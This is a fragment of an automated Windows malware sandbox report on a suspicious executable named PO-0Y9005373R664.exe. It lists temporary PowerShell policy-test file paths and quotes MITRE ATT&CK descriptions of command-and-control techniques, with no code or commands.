C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbumgdo1.i4u.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gdg3ytxr.0gz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ig1aggtv.1x5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbb03zfi.soz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rweqh102.h0i.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2nf3jon.4uy.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ul5tz4st.ukm.psm1

Windows Analysis Report
PO-0Y9005373R664.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre